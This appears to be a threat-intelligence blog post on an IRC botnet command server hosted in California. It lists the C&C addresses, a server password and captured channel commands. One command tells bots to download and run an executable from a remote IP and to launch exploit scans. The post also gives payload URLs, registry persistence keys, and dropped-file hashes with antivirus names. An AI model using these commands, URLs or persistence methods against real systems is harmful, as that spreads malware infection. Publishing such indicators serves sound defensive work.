98.126.44.98(Botnet hosted with kryptservers.com USA California)

still USA hosting involved in Botnet hosting

Remote Host Port Number
208.53.183.219 80
208.53.183.73 80
208.53.183.92 80
98.126.44.98 8100 PASS laorosr ircd here

MODE #! -ix
MODE #Ma -ix
USER SP2-650 * 0 :COMPUTERNAME
MODE [N00_USA_XP_9718720]
@ -ix
MODE #dpi -ix

Joins channel: :#!
#! :.asc​-S|.http​ http://​208.53.1​83.217/u​se13.exe​|.asc ex​p_all 30​ 5 0 -a-​r -e|.as​c exp_al​l 30 5 0​ -b -r-e​|.asc ex​p_all30 ​5 0 -b|.​asc exp_​all 30 5​ 0 -c|.a​sc exp_a​ll 30 5 ​0 -a

nick [N00_USA_XP_4967390]
USER SP2-078 * 0 :COMPUTERNAME

Other details

* The following port was open in the system:

Port Protocol Process
1057 TCP cfdrive32.exe (%Windir%cfdrive32.exe)

* The data identified by the following URLs was then requested from the remote web server:
o http://208.53.183.219/serv6.exe
o http://208.53.183.73/foxjbewj._
o http://208.53.183.92/usa.exe

Registry Modifications

* The following Registry Keys were created:
o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer
o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun

* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun]
+ Microsoft Driver Setup = “%Windir%cfdrive32.exe”

so that cfdrive32.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
+ Microsoft Driver Setup = “%Windir%cfdrive32.exe”

so that cfdrive32.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon]
+ Taskman = “%AppData%oekx.exe”

so that oekx.exe runs every time Windows starts

Memory Modifications

* There were new processes created in the system:

Process Name Process Filename Main Module Size
cfdrive32.exe %Windir%cfdrive32.exe 339 968 bytes
9188.exe %Temp%9188.exe 339 968 bytes

File System Modifications

* The following files were created in the system:

# Filename(s) File Size File Hash Alias
1 %AppData%oekx.exe
[file and pathname of the sample #1] 98 304 bytes MD5: 0x2FDB85B02FE089750F7F3B7183279012
SHA-1: 0xEF5BFE39F0E410E88D8171EE9BCB11578F29645D W32/Rimecud.gen.l [McAfee]
2 %Temp%474.exe 2 182 bytes MD5: 0xE193D9CE690D7FCD592FF6B92357783F
SHA-1: 0xA6FA1E134460D33E5DA411534C0969EBB99475B3 (not available)
3 %Temp%614988.exe 36 864 bytes MD5: 0xACF1E44740A7533C1C5A262D447FBCF2
SHA-1: 0x33D289CD1A03CA6449CF5D9E131784F2EAE9407C VirTool:Win32/Injector.T [Microsoft]
Virus.Win32.Injector [Ikarus]
4 %Temp%9188.exe
%Windir%cfdrive32.exe 167 936 bytes MD5: 0x6592DB13E7E8AD89991429A0CC6D5CEA
SHA-1: 0xB170F75E1428F8D2178D6883429FF5932B81344C W32/Rimecud.gen.m [McAfee]
Virus.Win32.Vitro [Ikarus]
5 %Windir%Tempscs1.tmp 2 686 bytes MD5: 0x4A587187D760161311010B03417B3C3F
SHA-1: 0x863BBF5F7F4114A1307C6BAD5DD89224D511FED5 (not available)

more info about the hoster here:
http://whois.domaintools.com/98.126.44.98
http://whois.domaintools.com/208.53.183.219

Categories: Uncategorized